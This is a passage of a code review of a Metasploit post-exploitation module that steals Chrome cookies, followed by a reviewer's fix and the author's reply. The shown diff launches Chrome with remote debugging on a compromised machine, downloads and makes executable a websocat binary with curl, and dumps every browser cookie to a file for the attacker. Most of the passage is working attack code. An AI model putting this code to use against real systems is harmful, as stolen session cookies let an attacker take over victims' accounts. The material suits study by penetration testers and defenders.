modules/post/chrome/gather/cookies.rb

```diff
@@ -0,0 +1,176 @@
+      @websocat_url_suffix = 'mac'
+    when 'windows'
+      print_error "Windows isn't supported by this module. See github.com/defaultnamehere/cookie_crimes for manual instructions."
+      @platform = :windows
+      return
+    else
+      print_error "Unsupported platform: #{session.platform}"
+      return
+    end
+
+    unless datastore['CHROME_BINARY_PATH'].empty?
+      @chrome = datastore['CHROME_BINARY_PATH']
+    end
+
+    @chrome_debugging_cmd = "#{@chrome} --headless --user-data-dir=\"#{@user_data_dir}\" --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']} #{datastore['HEADLESS_URL']}"
+
+    nil
+  end
+
+  def activate_remote_debugging
+    @debugger_pid = cmd_exec_get_pid(@chrome_debugging_cmd)
+    print_status("Activated Chrome's Remote Debugging via #{@chrome_debugging_cmd}")
+
+    # Sleep so the Chrome process has time to start and open
+    # the tab before we query the remote debugging port.
+    # You may need a longer sleep time on a slower machine.
+    sleep 2.seconds
+  end
+
+  def get_websocket_url
+    response = cmd_exec("curl -s http://localhost:#{datastore['REMOTE_DEBUGGING_PORT']}/json")
+    websocket_url = JSON.parse(response)[0]['webSocketDebuggerUrl']
+    vprint_status("Found webSocketDebuggerUrl #{websocket_url}")
+    websocket_url
+  end
+
+  def download_websocat
+    if Pathname.new(@websocat_storage_path).exist?
+      print_status "websocat binary already exists at #{@websocat_storage_path}, skipping download"
+      return
+    end
+
+    url = WEBSOCAT_URL + @websocat_url_suffix
+    print_warning "Writing websocat binary to #{@websocat_storage_path} temporarily"
+    print_status "Downloading #{url} to #{@websocat_storage_path}"
+    cmd_exec "curl -L #{url} > #{@websocat_storage_path}"
+    cmd_exec "chmod +x #{@websocat_storage_path}"
+    vprint_status 'Download complete'
+
+    # Sleep here because there's sometimes a race condition ("file busy") between the binary being downloaded and executed.
+    sleep 5.seconds
+  end
+
+  def cleanup_websocat
+    cmd_exec "rm #{@websocat_storage_path}"
+    print_status "Deleted #{@websocat_storage_path}"
+    cmd_exec "rm #{@cookie_storage_path}"
+    print_status "Deleted #{@cookie_storage_path}"
+  end
+
+  def get_cookies(ws_url)
+
+    download_websocat
+
+    begin
+      # Redirect to a file because websocat streams the data, and can't send cookies larger than 65535 bytes in one message.
+      # This breaks cmd_exec, which cuts off the data partway. We're already writing to disk anyway, so I sure hope this is a good enough opsec tradeoff.
+      print_warning "Writing cookies to #{@cookie_storage_path} temporarily"
+      cmd = "echo '#{GET_ALL_COOKIES_REQUEST}' | #{@websocat_storage_path} -q #{ws_url} > #{@cookie_storage_path}"
+      errors = cmd_exec cmd
+
+      unless errors.empty?
+        print_bad "Error running #{cmd}"
+        print_error errors
+      end
+
+      cookies = File.read "#{@cookie_storage_path}"
```

Comment:
I'm guessing you tested this on localhost. I'm fairly certain `File.read` will execute on the msf host, not the client host. You want `read_file`.

```suggestion
      cookies = read_file "#{@cookie_storage_path}"
```

Reply:
ahahaha, whoops, how clumsy. Thanks for catching that ^^